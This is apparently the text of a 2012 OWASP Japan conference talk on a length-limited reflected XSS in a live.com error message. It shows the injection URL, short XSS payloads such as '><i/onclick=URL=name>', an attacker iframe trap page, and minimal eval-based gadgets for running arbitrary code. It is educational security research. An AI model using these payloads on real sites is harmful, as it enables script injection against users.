owasp japan 2 nd local chapter meeting short talk of xss jun 27 2012 yosuke hasegawa 短いxssの話

OWASP Japan 2nd local chapter meeting

Short talk of XSS

Jun 27 2012Yosuke HASEGAWA

短い XSS の話

One dayある日

As alwayssurfed websites,

いつものように Web を眺めてると…

Just the usualXSS was found.

いつものように XSS が見つかった。

First of all,view-source:

とりあえず HTML ソース

What!?

なにこれ !?

<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />

https://*.live.com/?param=><h1>XSSed</h1><!--

XSS caused by error message

不要なエラーメッセージが引き起こした XSS

Microsoft “live.com”Over httpsNeedless error message

Interesting but not really matter now

興味深いけれど今はどうでもいい

Why not “alert” ?なんで alert じゃないの ?

alert is common knowledge for XSSers

alert は僕らの常識

Reason

理由

<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />

https://*.live.com/?param=><h1>XSSed</h1><!--

22 letters max.最大 22 文字

><h1>XSSed</h1><!--

><h1>XSSed</h1><!-- … 19 letters

XSS under 22 letters is too hard

22 文字以下で XSS させるのは難しい

><script>alert(1)</script> …　 26 letters ><script>eval(name)</script> …　 28 letters

XSS で任意のコードを動かすには何文字必要 ?

by Gareth Heyes

by Gareth HeyesXSS Golf

Shortest XSS Challanges

<x/x=&{eval(name)}; // @0x6D6172696F Netscape 4

<svg/onload=eval(name) // @0x6D6172696F

19 letters

22 letters

Go back to the XSS

話を例の XSS に戻して

<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />

https://*.live.com/?param=><h1>XSSed</h1><!--

22 letters max.最大 22 文字

><h1>XSSed</h1><!--

Impossible? No!

不可能？そんなことはない！

IE has “URL” property

IE は "URL" プロパティを持っている

><i/onclick=URL=name> …　 21 letters

// Trap page created by attacker<iframe src="target" name="javascript:alert(1)">// or use window.open from JavaScript

Mario Heiderich’s work

Did it!

できた !!XSS Filter is disabled

Variations

22 文字あれば任意のコードが実行可能

<input type=hidden value=><i/onclick=URL=name>

<input type=text value= onclick=URL=name>

<input type=hidden value=""><i/onclick=URL=name>">

20 letters

22 letters

17 letters

Run arbitrary code in 22 letters

Shortest JavaScript

10 letters eval(name)

to run arbitrary code

9 letters eval(URL)

8 letters URL=name

6 letters $(URL)

任意コードを実行する最小の JavaScript

NetAgent http://www.netagent.co.jp/OWASP Japan 2nd local chapter meeting

Question?

hasegawa@utf-8.jphasegawa@netagent.co.jp

@hasegawayosuke

http://utf-8.jp/